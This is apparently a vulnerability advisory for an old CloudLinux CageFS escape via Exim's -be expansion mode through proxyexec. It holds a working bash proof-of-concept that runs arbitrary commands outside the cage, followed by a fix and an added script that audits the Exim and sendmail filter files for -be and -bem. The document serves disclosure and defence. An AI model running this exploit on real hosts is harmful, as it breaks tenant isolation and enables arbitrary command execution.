Vulnerability
Affected software: CloudLinux CageFS, unknown version (old vulnerability from around 2016; I no longer have the original report)
CloudLinux CageFS can be bypassed by running Exim in expansion-testing mode.
In expansion-testing mode (exim -be), Exim reads strings and performs string expansion on them. The expansion item ${run{<command> <args>}{<string1>}{<string2>}} executes <command> with the given arguments as part of that expansion: the result is <string1> if the command exits 0 and <string2> otherwise, with the command's output available in $value. CageFS runs Exim outside the cage through proxyexec, and proxyexec did not filter the -be argument before invoking Exim, so a user inside CageFS could feed an expansion string containing ${run{...}} to Exim and thereby execute arbitrary commands outside CageFS.
Exploit
#!/bin/bash
# PoC: run a command outside CageFS via the proxyexec EXIM handler.
# Exim is started with -be, so its stdin is treated as an expansion string
# and the embedded ${run{...}} item executes the command outside the cage.
if [[ $# -eq 0 ]]
then
    echo "Usage: $0 <command> [arg]..."
    exit 1
fi
# The home directory is visible both inside and outside the cage, so the
# command writes its output there and we read it back afterwards.
OUTPUT_FILE=$(mktemp -p "${HOME}")
# ${run{cmd}{string1}{string2}}: string1 is the expansion result if cmd
# exits 0, string2 otherwise; the command's own output goes to OUTPUT_FILE.
echo "\${run{/bin/bash -c \"$* >${OUTPUT_FILE}\"}{foo}{bar}}" | /usr/sbin/proxyexec -c cagefs.sock "$USER" "$(cat /var/.cagefs/.cagefs.token)" "$(pwd)" EXIM -be
cat "${OUTPUT_FILE}"
rm "${OUTPUT_FILE}"
Solution
Update CageFS to an unaffected version. To verify a host, check that the -be and -bem parameters (-bem is the same expansion-testing mode with a message file supplied, so it reaches the same ${run{...}} expansion) are filtered in /etc/cagefs/filters/exim.json and /etc/cagefs/filters/sendmail.json. Both files need the entry, since Exim is reachable under either name.
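To make that check concrete, here is a small script added to this write-up as an illustration; it is not taken from the original advisory or from CloudLinux. It assumes only that a denied switch shows up in the filter file as a JSON string token such as "-be" (this page does not document the exact schema of /etc/cagefs/filters/*.json, so the check is a token-level heuristic rather than a parser), and it deliberately treats "-be" and "-bem" as separate tokens, because a deny list that mentions only one of them leaves the other open. The filter file contents built inside demo are constructed for the example.

```shell
# Added illustration, not part of the original advisory or of CageFS itself.
# Checks whether CageFS proxyexec filter files name Exim's expansion-testing
# switches. Assumption: a denied switch appears in the file as the JSON string
# token "<switch>"; the real schema is not described on this page.

# filter_denies FILE SWITCH
#   0 if FILE contains the JSON string token "SWITCH", 1 if not, 2 if FILE is
#   unreadable. The surrounding quotes are part of the match, so a file that
#   lists only "-be" is NOT counted as covering "-bem" (and vice versa).
filter_denies() {
    file=$1
    switch=$2
    [ -r "$file" ] || return 2
    grep -qF -- "\"$switch\"" "$file"
}

# check_filters FILE...
#   Prints one line per (file, switch) pair. Returns 1 if any file fails to
#   list -be or -bem, i.e. the expansion-testing path may still be open.
check_filters() {
    rc=0
    for f in "$@"; do
        for s in -be -bem; do
            if filter_denies "$f" "$s"; then
                echo "OK   $f lists $s"
            else
                echo "FAIL $f does not list $s"
                rc=1
            fi
        done
    done
    return $rc
}

# demo
#   Builds three constructed filter files (made-up content in the assumed
#   format) and prints the verdict for each as "good:partial:bad", where 0
#   means the file lists both switches and 1 means at least one is missing.
demo() {
    d=$(mktemp -d)
    printf '{"EXIM": {"deny": ["-be", "-bem", "-C"]}}\n' > "$d/good.json"
    printf '{"EXIM": {"deny": ["-be", "-C"]}}\n'         > "$d/partial.json"
    printf '{"EXIM": {"deny": ["-C", "-D"]}}\n'          > "$d/bad.json"
    if check_filters "$d/good.json"    >/dev/null; then g=0; else g=1; fi
    if check_filters "$d/partial.json" >/dev/null; then p=0; else p=1; fi
    if check_filters "$d/bad.json"     >/dev/null; then b=0; else b=1; fi
    rm -rf "$d"
    echo "$g:$p:$b"
}

# On a live host, run the check against the two files named in the advisory:
#   check_filters /etc/cagefs/filters/exim.json /etc/cagefs/filters/sendmail.json
```

check_filters returns non-zero as soon as any file misses either switch, so it drops straight into a fleet-wide audit loop; if you know the actual filter schema on your hosts, replace the grep with a real JSON lookup so that a switch mentioned in a comment or in an unrelated key cannot produce a false OK.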
Timeline
Unknown (old vulnerability from around 2016; I no longer have the original report; it was fixed around 2016).